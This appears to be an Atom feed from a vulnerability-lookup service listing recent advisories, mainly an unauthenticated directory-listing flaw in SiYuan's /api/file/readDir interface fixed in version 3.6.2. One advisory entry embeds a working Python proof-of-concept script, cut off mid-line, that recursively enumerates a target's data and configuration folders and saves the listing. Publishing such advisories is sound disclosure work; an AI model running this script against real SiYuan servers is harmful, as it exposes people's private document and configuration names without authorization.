<?xml version='1.0' encoding='UTF-8'?>
<?xml-stylesheet href="/static/style.xsl" type="text/xsl"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
  <id>https://cve.radiocsirt.org/rss/recent/all/10</id>
  <title>Most recent entries from all</title>
  <updated>2026-10-06T15:06:05.755044+00:00</updated>
  <author>
    <name>Vulnerability-Lookup</name>
    <email>csirt@opendfir.org</email>
  </author>
  <link href="https://cve.radiocsirt.org" rel="alternate"/>
  <generator uri="https://lkiesow.github.io/python-feedgen" version="1.0.0">python-feedgen</generator>
  <subtitle>Contains only the most 10 recent entries.</subtitle>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/euvd-2026-277975</id>
    <title>EUVD-2026-277975</title>
    <updated>2026-10-06T15:06:05.822659+00:00</updated>
    <content>EUVD-2026-277975</content>
    <link href="https://cve.radiocsirt.org/vuln/euvd-2026-277975"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/fkie_cve-2026-33670</id>
    <title>fkie_cve-2026-33670</title>
    <updated>2026-10-06T15:06:05.822718+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml">
        <p>SiYuan is a personal knowledge management system. Prior to version 3.6.2, the /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook. Version 3.6.2 patches the issue.</p>
      </div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/fkie_cve-2026-33670"/>
  </entry>
  <entry>
    <id>https://cve.radiocsirt.org/vuln/ghsa-xmw9-6r43-x9ww</id>
    <title>GHSA-xmw9-6r43-x9ww — SiYuan has directory traversal within its publishing service</title>
    <updated>2026-10-06T15:06:05.822768+00:00</updated>
    <content type="xhtml">
      <div xmlns="http://www.w3.org/1999/xhtml"><p><strong>Affected:</strong> Go: github.com/siyuan-note/siyuan/kernel</p>
<p>### Details</p>
<p>The /api/file/readDir interface was used to traverse and retrieve the file names of all documents under a notebook.</p>
<p>### PoC</p>
<p>```python
#!/usr/bin/env python3
"""POC: SiYuan /api/file/readDir 未鉴权目录遍历"""
import requests, json, sys</p>
<p>def poc(target):
    base = target.rstrip("/")
    url = f"{base}/api/file/readDir"</p>
<p>def read_dir(path, depth=0, max_depth=4):
        try:
            r = requests.post(url, json={"path":path},
                            headers={"Content-Type":"application/json"}, timeout=10)
            data = r.json()
        except Exception as e:
            return
        if data.get("code") != 0:
            return</p>
<p>entries = data.get("data") or []
        for entry in entries:
            name = entry.get("name","")
            if name.startswith("."):
                continue
            icon = "📁" if entry.get("isDir") else "📄"
            indent = "  " * depth
            print(f"  {indent}{icon} {name}")</p>
<p>if entry.get("isDir") and depth &lt; max_depth:
                read_dir(f"{path}/{name}", depth+1, max_depth)</p>
<p># 遍历根目录
    print("[+] 漏洞存在！开始遍历\n")
    print("  📂 data/")
    read_dir("data", max_depth=2)</p>
<p>print("\n  📂 conf/")
    read_dir("conf", max_depth=2)</p>
<p># 保存
    try:
        r = requests.post(url, json={"path":"data"},
                        headers={"Content-Type":"application/json"}, timeout=10)
        with open("readdir.json","w",encoding="utf-8") as f:
            json.dump(r.json(), f, ens…</p></div>
    </content>
    <link href="https://cve.radiocsirt.org/vuln/ghsa-xmw9-6r43-x9ww"/>
  </entry>
</feed>
